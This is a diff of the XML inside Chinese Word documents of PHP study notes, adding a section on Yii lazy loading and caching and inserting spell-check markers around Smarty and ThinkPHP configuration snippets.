+              <w:t>：使用</w:t>
+            </w:r>
+            <w:r>
+              <w:t>with</w:t>
+            </w:r>
+            <w:r>
+              <w:t>降低查询次数</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A25708A" wp14:editId="1FC6190D">
+                  <wp:extent cx="3952240" cy="1677670"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="36" name="图片 36"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId39"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3952240" cy="1677670"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.3 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>延迟</w:t>
+      </w:r>
+      <w:r>
+        <w:t>加载和缓存</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a4"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="6439"/>
+        <w:gridCol w:w="6440"/>
+        <w:gridCol w:w="6440"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6439" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>类</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>延迟加载</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：使用时才</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>导入</w:t>
+            </w:r>
+            <w:r>
+              <w:t>文件，之前不报错。</w:t>
+            </w:r>
+            <w:r>
+              <w:t>YII</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>自身</w:t>
+            </w:r>
+            <w:r>
+              <w:t>就是用的这种技术。延迟加载</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>的</w:t>
+            </w:r>
+            <w:r>
+              <w:t>示例</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="150" w:firstLine="315"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FA05C89" wp14:editId="62C00573">
+                  <wp:extent cx="3133725" cy="2971800"/>
+                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+                  <wp:docPr id="29" name="图片 29"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId40"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3133725" cy="2971800"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>类</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>映射表</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>指定</w:t>
+            </w:r>
+            <w:r>
+              <w:t>某个类所在的类文件路径，更快的加载类，提高性能</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>示例</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D426544" wp14:editId="2733C5F6">
+                  <wp:extent cx="3952240" cy="299085"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+                  <wp:docPr id="34" name="图片 34"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId41"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3952240" cy="299085"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>数据</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>缓存</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）缓存的基本使用</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03E8490F" wp14:editId="6C04FE07">
+                  <wp:extent cx="3095625" cy="3076575"/>
+                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+                  <wp:docPr id="38" name="图片 38"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId42"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3095625" cy="3076575"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）缓存有效期：</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>单位</w:t>
+            </w:r>
+            <w:r>
+              <w:t>秒</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59B7ED36" wp14:editId="1EB65B97">
+                  <wp:extent cx="3333750" cy="552450"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="39" name="图片 39"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId43"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3333750" cy="552450"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>片段</w:t>
+            </w:r>
+            <w:r>
+              <w:t>依赖：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="2" w:name="_GoBack"/>
+            <w:bookmarkEnd w:id="2"/>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
     <w:p/>
     <w:p/>
     <w:p/>

--- a/编程技能汇总/PHP/PHP进阶_框架.docx
+++ b/编程技能汇总/PHP/PHP进阶_框架.docx
@@ -290,6 +290,7 @@
               </w:rPr>
               <w:t>$smarty-&gt;</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
@@ -298,6 +299,7 @@
               </w:rPr>
               <w:t>left_delimiter</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
@@ -358,6 +360,7 @@
               </w:rPr>
               <w:t>$smarty-&gt;</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
@@ -366,6 +369,7 @@
               </w:rPr>
               <w:t>right_delimiter</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
@@ -440,7 +444,25 @@
                 <w:color w:val="000000"/>
                 <w:kern w:val="0"/>
               </w:rPr>
-              <w:t>$smarty-&gt;setTemplateDir(</w:t>
+              <w:t>$smarty-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+              </w:rPr>
+              <w:t>setTemplateDir</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+              </w:rPr>
+              <w:t>(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -448,7 +470,25 @@
                 <w:color w:val="0000C0"/>
                 <w:kern w:val="0"/>
               </w:rPr>
-              <w:t>"tpl"</w:t>
+              <w:t>"</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0000C0"/>
+                <w:kern w:val="0"/>
+              </w:rPr>
+              <w:t>tpl</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0000C0"/>
+                <w:kern w:val="0"/>
+              </w:rPr>
+              <w:t>"</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -492,7 +532,25 @@
                 <w:color w:val="000000"/>
                 <w:kern w:val="0"/>
               </w:rPr>
-              <w:t>$smarty-&gt;setCompileDir(</w:t>
+              <w:t>$smarty-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+              </w:rPr>
+              <w:t>setCompileDir</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+              </w:rPr>
+              <w:t>(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -500,7 +558,25 @@
                 <w:color w:val="0000C0"/>
                 <w:kern w:val="0"/>
               </w:rPr>
-              <w:t>"templates_c"</w:t>
+              <w:t>"</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0000C0"/>
+                <w:kern w:val="0"/>
+              </w:rPr>
+              <w:t>templates_c</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0000C0"/>
+                <w:kern w:val="0"/>
+              </w:rPr>
+              <w:t>"</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -544,7 +620,25 @@
                 <w:color w:val="000000"/>
                 <w:kern w:val="0"/>
               </w:rPr>
-              <w:t>$smarty-&gt;setCacheDir(</w:t>
+              <w:t>$smarty-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+              </w:rPr>
+              <w:t>setCacheDir</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+              </w:rPr>
+              <w:t>(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -655,7 +749,25 @@
                 <w:color w:val="557F5F"/>
                 <w:kern w:val="0"/>
               </w:rPr>
-              <w:t>// $smarty-&gt;cache_lifetime=120;//</w:t>
+              <w:t>// $smarty-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="557F5F"/>
+                <w:kern w:val="0"/>
+              </w:rPr>
+              <w:t>cache_lifetime</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="557F5F"/>
+                <w:kern w:val="0"/>
+              </w:rPr>
+              <w:t>=120;//</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -795,7 +907,25 @@
                 <w:color w:val="0000C0"/>
                 <w:kern w:val="0"/>
               </w:rPr>
-              <w:t>"test.tpl"</w:t>
+              <w:t>"</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0000C0"/>
+                <w:kern w:val="0"/>
+              </w:rPr>
+              <w:t>test.tpl</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0000C0"/>
+                <w:kern w:val="0"/>
+              </w:rPr>
+              <w:t>"</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1117,6 +1247,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1130,6 +1261,7 @@
               </w:rPr>
               <w:t>oreach</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1756,9 +1888,11 @@
         </w:rPr>
         <w:t>，</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>ThinkPHP</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>框架</w:t>
       </w:r>
@@ -1793,9 +1927,11 @@
       <w:r>
         <w:t>的</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>ThinkPHP</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>参考手册请点击以下链接</w:t>
       </w:r>
@@ -1916,12 +2052,14 @@
             <w:tcW w:w="6441" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>ThinkPHP</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2012,6 +2150,7 @@
             <w:r>
               <w:t>目录下创建</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -2021,6 +2160,7 @@
             <w:r>
               <w:t>.php</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -2030,11 +2170,19 @@
             <w:r>
               <w:t>定义模块的基本信息，执行</w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>php console build</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>php</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve"> console build</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2098,9 +2246,11 @@
             <w:r>
               <w:t>开启</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>pathinfo</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -2353,9 +2503,11 @@
             <w:r>
               <w:t>传统的</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>url</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>文件路径方式访问</w:t>
             </w:r>
@@ -2405,8 +2557,13 @@
               <w:t>application</w:t>
             </w:r>
             <w:r>
-              <w:t>/config.php</w:t>
-            </w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>config.php</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -2453,22 +2610,38 @@
                 <w:color w:val="0070C0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>'url_controller_convert'    =&gt;  false,</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+              <w:t>'</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
+              <w:t>url_controller_convert</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
                 <w:color w:val="0070C0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
+              <w:t>'    =&gt;  false,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t xml:space="preserve">// </w:t>
             </w:r>
             <w:r>
@@ -2486,7 +2659,23 @@
                 <w:color w:val="0070C0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>'url_action_convert'        =&gt;  false,</w:t>
+              <w:t>'</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>url_action_convert</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>'        =&gt;  false,</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2800,12 +2989,28 @@
             <w:r>
               <w:t>可以使用的配置项在</w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>thinkphp/convention.php</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>thinkphp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>convention.php</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -2815,9 +3020,11 @@
             <w:r>
               <w:t>中，并且已经有默认配置，可以选择需要的配置项放入</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>config.php</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -3038,22 +3245,80 @@
               </w:rPr>
               <w:t xml:space="preserve">     </w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>Config::parse(APP_PATH.'my_config.ini','ini');</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Config</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>::parse(APP_PATH.'my_config.</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>ini</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>','</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>ini</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>');</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLineChars="250" w:firstLine="525"/>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>Config::parse(APP_PATH.'my_config.xml','xml');</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
